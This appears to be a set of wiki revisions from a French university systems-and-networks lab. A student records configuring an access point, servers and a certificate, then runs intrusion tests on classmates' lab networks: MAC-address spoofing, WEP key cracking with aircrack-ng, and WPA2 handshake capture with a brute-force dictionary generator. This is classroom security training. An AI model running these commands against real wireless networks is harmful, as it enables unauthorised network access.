From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23132
TP sysres IMA2a5 2015/2016 G3
2015-11-22T18:11:57Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23131
TP sysres IMA2a5 2015/2016 G3
2015-11-22T18:07:43Z
<p>Mstrunc : </p>
<hr />
<div><head>Projet Système & Réseaux IMA2A S9 <head /><br />
<br />
<br />
<br />
<br />
<br /><br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
